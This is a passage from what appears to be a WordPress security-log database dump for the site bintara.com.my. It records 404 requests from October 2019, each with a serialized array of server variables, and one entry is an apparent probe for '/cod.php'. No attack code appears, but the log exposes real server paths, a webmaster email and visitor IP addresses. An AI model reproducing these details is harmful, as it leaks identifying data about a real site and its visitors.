14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaKxgQkNfFWjTvvon1oQQAAAAVU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570943361.8976\";s:12:\"REQUEST_TIME\";s:10:\"1570943361\";}}','notice','2019-10-13 05:09:24','2019-10-13 05:09:22',35834512,37633224,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'49.50.237.136'),(27954,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"15077FA5-9491-499E-BA0D-30FDF5F66746\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaKyag7WMZbw-is73Dm07wAAAEo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.119.28\";s:11:\"REMOTE_PORT\";s:5:\"55193\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaKyag7WMZbw-is73Dm07wAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570943594.8122\";s:12:\"REQUEST_TIME\";s:10:\"1570943594\";}}','notice','2019-10-13 05:13:17','2019-10-13 05:13:15',35733840,37538648,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.119.28'),(27955,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:69:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/21.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"75.119.200.115\";s:11:\"REMOTE_PORT\";s:5:\"49925\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLCBQkNfFWjTvvon1oUrQAAAVA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570947589.8008\";s:12:\"REQUEST_TIME\";s:10:\"1570947589\";}}','notice','2019-10-13 06:19:53','2019-10-13 06:19:50',35027800,36833832,'https://bintara.com.my/?page_id=18',1,0,'75.119.200.115'),(27956,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.126.196.214\";s:11:\"REMOTE_PORT\";s:5:\"40421\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLC4A7WMZbw-is73DnAOAAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570947808.858\";s:12:\"REQUEST_TIME\";s:10:\"1570947808\";}}','notice','2019-10-13 06:23:32','2019-10-13 06:23:29',35032968,36841232,'https://bintara.com.my/?page_id=18',1,0,'192.126.196.214'),(27957,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.126.196.214\";s:11:\"REMOTE_PORT\";s:5:\"59734\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLC5sy55D9cVEDGHXm0RQAAABA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570947814.5233\";s:12:\"REQUEST_TIME\";s:10:\"1570947814\";}}','notice','2019-10-13 06:23:37','2019-10-13 06:23:35',35032304,36843408,'https://bintara.com.my/?page_id=18',1,0,'192.126.196.214'),(27958,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.126.196.214\";s:11:\"REMOTE_PORT\";s:5:\"39682\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLC68y55D9cVEDGHXm0SQAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570947819.5807\";s:12:\"REQUEST_TIME\";s:10:\"1570947819\";}}','notice','2019-10-13 06:23:43','2019-10-13 06:23:40',35030880,36840328,'https://bintara.com.my/?page_id=18',1,0,'192.126.196.214'),(27959,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:18:\"http://bintara.net\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.126.196.214\";s:11:\"REMOTE_PORT\";s:5:\"38713\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLC8g7WMZbw-is73DnARgAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570947826.2547\";s:12:\"REQUEST_TIME\";s:10:\"1570947826\";}}','notice','2019-10-13 06:23:49','2019-10-13 06:23:47',35030880,36840328,'https://bintara.com.my/?page_id=18',1,0,'192.126.196.214'),(27960,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/22.html\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:14:\"bytes=0-524287\";s:15:\"HTTP_USER_AGENT\";s:73:\"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/22.html\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/22.html\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaLFYw7WMZbw-is73DnBvwAAAFg\";s:12:\"REDIRECT_URL\";s:8:\"/22.html\";s:11:\"REMOTE_ADDR\";s:13:\"173.252.87.26\";s:11:\"REMOTE_PORT\";s:5:\"38328\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/22.html\";s:10:\"SCRIPT_URL\";s:8:\"/22.html\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLFYw7WMZbw-is73DnBvwAAAFg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570948452.1044\";s:12:\"REQUEST_TIME\";s:10:\"1570948452\";}}','notice','2019-10-13 06:34:15','2019-10-13 06:34:12',35018912,35376336,'https://bintara.com.my/22.html',1,0,'173.252.87.26'),(27961,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"162.248.4.10\";s:11:\"REMOTE_PORT\";s:5:\"47508\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLGIA7WMZbw-is73DnCMgAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570948640.6577\";s:12:\"REQUEST_TIME\";s:10:\"1570948640\";}}','notice','2019-10-13 06:37:23','2019-10-13 06:37:21',35028192,36844056,'https://bintara.com.my/?page_id=18',1,0,'162.248.4.10'),(27962,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/cod.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/cod.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/cod.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaLHsqRqUuFjrwjUTkVWsgAAAIM\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/cod.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/cod.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaLHsqRqUuFjrwjUTkVWsgAAAIM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"35002\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/cod.php\";s:10:\"SCRIPT_URL\";s:8:\"/cod.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaLHsqRqUuFjrwjUTkVWsgAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570949042.4736\";s:12:\"REQUEST_TIME\";s:10:\"1570949042\";}}','notice','2019-10-13 06:44:04','2019-10-13 